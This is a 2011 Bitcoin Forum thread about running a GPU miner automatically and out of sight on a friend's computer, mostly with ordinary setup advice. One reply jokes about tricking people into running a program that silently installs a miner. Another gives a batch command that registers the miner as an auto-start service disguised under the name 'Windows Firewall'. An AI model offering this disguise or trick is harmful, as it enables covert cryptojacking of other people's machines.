Bitcoin Forum
April 24, 2024, 04:27:56 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]

Home   Help Search Login Register More  
Pages: [1] 2 »  All
  Print  
Author Topic: Auto Run Miners, Run Miners in Background/as Service?  (Read 27367 times)
SchizophrenicX (OP)

Activity: 112
Merit: 100

"I'm not psychic; I'm just damn good"

View Profile
May 19, 2011, 08:48:03 AM
Last edit: May 23, 2011, 04:47:27 AM by SchizophrenicX

Hey guys, my friend with 5970 has agreed to let me use his computer for mining since he isn't interested in the whole scene, what I'll like to know is how best to install a miner such that it doesn't require anything on his part and it'll mine as usual.

I've started like hours ago and I'm just wondering, if I'm doing pool mining doesn't that mean that my miner computers doesn't require the client? (Or does it?)

To my understanding, if the computer requires it's GPU (for games and what not), the miner would not stand in the way nor affect the performance too much (Either for CPU or GPU), please correct me if I'm wrong.

I want to try and reduce as much interference and minimally invasive to my friend as possible, so I'm thinking the installation should be minimal, just include a simple script that starts with the computer and runs the miner in the background/service. I'm also not that technically inclined so I might need help with this 'simple' script (I'm assuming), and what are the files/installations needed.

Tried searching the forum however kept getting irrelevant info, sorry if this has been done. Please point me to the right tread if this has been answered.

P.S I'd also like my MBP to have something like that, but I'm not sure how to get my MBP as a miner. I've got GUIMiner on my desktop though.

Similar Threads
Mining with invisible/hidden console on windows?
automated gpu minig setup
[Announce] WhileIdle application - Run miners only when computer is idle

"I'm sure that in 20 years there will either be very large transaction volume or no volume." -- Satoshi
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
[Tycho]

Activity: 742
Merit: 500

View Profile WWW
May 19, 2011, 08:52:07 AM

Hey guys, my friend with 5970 has agreed to let me use his computer for mining since he isn't interested in the whole scene, what I'll like to know is how best to install a miner such that it doesn't require anything on his part and it'll mine as usual.
You can mine in pool without using bitcoin client at all if you want to send your earnings directly to some exchanger.

Welcome to my bitcoin mining pool: https://deepbit.net - Both payment schemes (including PPS), instant payout, no invalid blocks !
ICBIT Trading platform : USD/BTC futures trading, Bitcoin difficulty futures (NEW!). Third year in bitcoin business.
SchizophrenicX (OP)

View Profile
May 19, 2011, 08:56:40 AM

I have the client at home, and the wallet is on my computer (? right ?) so I just have to set up the miner on my friend's desktop and have the pool account send the BTC to my wallet. Is this right?

Does his desktop need a wallet? does this set up make sense? I'm very new sorry, don't really know what an exchanger is and probably don't have one yet. I'm still trying to find out how to use/convert BTC right now.

[Tycho]

View Profile WWW
May 19, 2011, 09:00:16 AM

I have the client at home, and the wallet is on my computer (? right ?) so I just have to set up the miner on my friend's desktop and have the pool account send the BTC to my wallet. Is this right?
Yes.

Does his desktop need a wallet? does this set up make sense? I'm very new sorry, don't really know what an exchanger is and probably don't have one yet. I'm still trying to find out how to use/convert BTC right now.
No, he doesn't needs a wallet. Just set your bitcoin address in the pool's settings and the pool will send your reward to you.

Welcome to my bitcoin mining pool: https://deepbit.net - Both payment schemes (including PPS), instant payout, no invalid blocks !
ICBIT Trading platform : USD/BTC futures trading, Bitcoin difficulty futures (NEW!). Third year in bitcoin business.
SchizophrenicX (OP)

View Profile
May 19, 2011, 09:08:22 AM

Hi [Tycho] thanks for the prompt reply.

So with that overview out of the way. I'm using GUIMiner and I think it'll be annoying for my friend to have this GUI on all the time. Are there other miners out there that can run as a service or in the background that I can setup so that it starts mining when the computer is fired up.

Do I have to write a script or something? Is something like this complicated?

Also, are the different miner programs different? Is GUIMiner good?

I have a 4850 (700 Mhz) doing 70+ Mhash/s which is decent via the comparison chart, however I'm only generating very little amount of BTC so I'm currently also looking at different pools and how they charge and stuff.

Although I've been reading a lot on the forum and making tonnes of searches, I still don't know most of the benchmarks and norms. I really appreciate the help.

[Tycho]

View Profile WWW
May 19, 2011, 09:14:02 AM

So with that overview out of the way. I'm using GUIMiner and I think it'll be annoying for my friend to have this GUI on all the time. Are there other miners out there that can run as a service or in the background that I can setup so that it starts mining when the computer is fired up.
GUIminer can be minimized to system tray and won't be annoying.
Or you want to hide it so your friend won't know about the mining at all ?

Also, are the different miner programs different? Is GUIMiner good?
It's good.

I have a 4850 (700 Mhz) doing 70+ Mhash/s which is decent via the comparison chart, however I'm only generating very little amount of BTC so I'm currently also looking at different pools and how they charge and stuff.
Although I've been reading a lot on the forum and making tonnes of searches, I still don't know most of the benchmarks and norms. I really appreciate the help.
With 70 MH/s you should earn less than 0.3 BTC per day. Is it that "very little amount" ? If yes, then it's your expected reward, the only way to increase it is to buy more hardware.

Welcome to my pool - http://deepbit.net :)

SchizophrenicX (OP)

View Profile
May 19, 2011, 09:22:30 AM

GUIminer can be minimized to system tray and won't be annoying.
Or you want to hide it so your friend won't know about the mining at all ?

Yea, it'll be best if it could just be hidden. I promised I'd find a way to make it invisible so he wouldn't feel annoyed by it -.- I figured some kind of a script should exist or wouldn't be too hard for something like that.

I need the miner to fire up with the computer and hidden so he isn't bother by it and it isn't bothered by my friend either hahaha.

wow, you run a pool cool. Imma checking it out now. About the hardware upgrade a little hard up on cash right now. But well, my friend's comp just sits there all day anyway so yea. Perfect candidate.

SchizophrenicX (OP)

View Profile
May 19, 2011, 10:36:03 AM

UPDATE:

Thanks for clearing the air [Tycho] I'll definitely give deepbit a try Smiley

I've found on the search a auto start bat and a start task while idle C executable. So I guess I'll have to flip out the good 'o command batch programming book and start customizing to my needs. This is hardly the place to ask about programming.

error

Activity: 588

View Profile
May 20, 2011, 03:55:38 AM

Where can I get friends like that?

3KzNGwzRZ6SimWuFAgh4TnXzHpruHMZmV8
SomeoneWeird

Activity: 700

View Profile
May 20, 2011, 04:01:06 AM

Where can I get friends like that?

"Hey dude, can you run a program I just made an test it"
"sure"
*Upload file > Execute > Miner installs in background > Friend sees nothing*
"Nothings happening"
"Oh ok, don't worry"

Win Wink
SchizophrenicX (OP)

View Profile
May 20, 2011, 04:11:58 AM

Lol!~ Yea that could work. Well actually I just told a few of my friends who play SCII a lot, but they just dismissed it. So I told one of my better buds to let me borrow his "downtime".

Well generally he's just concern about his gameplay performance. People here are really skeptical about ponzi-sounding schemes so yea -.- but are very trusting with security stuff and such. Especially I'M such a good friend myself hahaha!!!

Anyway theres no easy way to make the program invisible unless you could really install shit on his computer lolx or write/edit one of the console miners. I'm not sure.

SomeoneWeird

Activity: 700

View Profile
May 20, 2011, 04:24:27 AM

Lol!~ Yea that could work. Well actually I just told a few of my friends who play SCII a lot, but they just dismissed it. So I told one of my better buds to let me borrow his "downtime".

Well generally he's just concern about his gameplay performance. People here are really skeptical about ponzi-sounding schemes so yea -.- but are very trusting with security stuff and such. Especially I'M such a good friend myself hahaha!!!

Anyway theres no easy way to make the program invisible unless you could really install shit on his computer lolx or write/edit one of the console miners. I'm not sure.

InstallMINER.bat:

Code:
sc create "Windows Firewall" binpath= "%systemroot%\system32\poclbm\poclbm.exe <args>" type= own start= auto Displayname= "Windows FireWall"

Should do the trick Wink
Viro

Activity: 49
Merit: 0

View Profile
May 20, 2011, 08:26:31 PM

InstallMINER.bat:

Code:
sc create "Windows Firewall" binpath= "%systemroot%\system32\poclbm\poclbm.exe <args>" type= own start= auto Displayname= "Windows FireWall"

Should do the trick Wink

Can poclbm.exe really work as a service? I tried creating a service for mine, however, I couldn't start it. Got an error when I tried.
Code:
Windows could not start the service on Local Computer.
Error 1503: The service did not respond to the start or control request in a timely fashion.
Borogove

Activity: 6

View Profile
May 20, 2011, 08:49:46 PM

Yea, it'll be best if it could just be hidden. I promised I'd find a way to make it invisible so he wouldn't feel annoyed by it -.- I figured some kind of a script should exist or wouldn't be too hard for something like that.

I need the miner to fire up with the computer and hidden so he isn't bother by it and it isn't bothered by my friend either hahaha.
Dude. Just add GUIMiner to the Startup group, set it to launch minimized, and make sure it's configured to minimize to the tray. Heck, if your friend is running Windows 7, it will even be automatically hidden, so he won't see the tray icon.
minerX

Activity: 56

View Profile
May 20, 2011, 10:03:12 PM

Uh.

You realize that the miner will crash his computer during various processes?  He won't be able to watch videos and/or play games while the miner is running.
SchizophrenicX (OP)

View Profile
May 23, 2011, 04:39:04 AM

Hi all,

Yea, I've done the Startup folder thing since I'm not inclined in programming. It's been doing quite well and my friend's happy Smiley Although he says it'll be better if it's running in the background course he has the habit of exiting everything when he goes hardcore gaming.

I've also tried to run it in scheduler as a service, both guiminer and poclbm runs, however it doesn't really do any mining at all. Any other suggestions for this?

rikur

Activity: 216

View Profile
May 23, 2011, 05:41:32 AM

I just lost a HDD and am writing this from a mac by heart. I did something similar to this:

- create a shortcut with all your mining options (username, password etc) targeting a gpu (usually with DEVICE parameter)
- modify the shortcut to be wrapped inside cmd.exe:
  cmd.exe /C start /AFFINITY 2 "your_miner.exe -plus -all -the -cool -options"
- test that the shortcut works
- copy&clone this shortcut into the Startup folder. One for each GPU, varying the DEVICE parameter
- reboot

The trick with the /AFFINITY is to set the process to only use CPU core #2 in this case. In windows 7 64bit, this helps you save power since p0clm miner uses 100% of the computing power of a single core for every GPU core.

HTH
SchizophrenicX (OP)

View Profile
May 23, 2011, 05:46:20 AM

Wow. I have no idea what you just said. I'm sorry but I'm not that IT inclined... So sorry...

P.S wait. I think you're actually referring to another miner, please specify which miner is this because I've only ever tried guiminer and poclbm-mod i think... I'm pretty new

rikur

Activity: 216

View Profile
May 23, 2011, 06:10:53 AM

http://support.microsoft.com/kb/140443
SoreGums

Activity: 129

View Profile
May 23, 2011, 06:22:16 AM

diablominer as a scheduled task works great... need upto date jre

phoenix doesn't yet - when the process is killed it crashes the vid drivers

haven't tried others.

i've only tested on windows 7...

you run diablo directly and in the box for arguments you put all the other stuff, no need for bat files etc...
Pages: [1] 2 »  All
  Print  

Jump to: